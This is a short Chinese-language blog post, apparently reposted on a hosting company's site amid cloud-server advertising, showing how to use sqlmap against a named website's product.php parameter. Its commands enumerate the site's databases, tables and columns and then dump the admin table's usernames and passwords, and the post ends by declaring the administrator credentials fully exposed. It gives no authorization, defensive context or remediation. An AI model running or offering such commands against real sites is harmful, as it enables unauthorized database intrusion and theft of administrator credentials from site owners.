sqlmap的使用-创新互联

用sqlmap进行注入

创新互联网站建设公司,提供成都网站建设、网站建设,网页设计,建网站,PHP网站建设等专业做网站服务;可快速的进行网站开发网页制作和功能扩展;专业做搜索引擎喜爱的网站,是专业的做网站团队,希望更多企业前来合作!

1、用扫描工具可以扫出注入点这里我用一个注入点进行说明。

sqlamp.py -u “http://www.gaoneng.com/product.php?cid=71”

sqlmap的使用

可以看出此处存在sql注入漏洞。

2、

sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71”

--dbs 可以跑出存在的数据库名

sqlmap的使用

然后可以跑gaoneng数据库中的表

Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71” -D gaoneng --tables

sqlmap的使用

既然已经爆出数据库里的表,那就可以爆出表中的字段

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71”

-D gaoneng -T com_admin --columns

sqlmap的使用

可以看到这个表中存在我们需要的字段,密码与用户名

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71”

-D gaoneng -T com_admin -C username,password --dump

sqlmap的使用

由此这个网站的管理员密码与用户名已被完全爆出。

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


分享标题:sqlmap的使用-创新互联
当前路径:http://scyanting.com/article/djosjc.html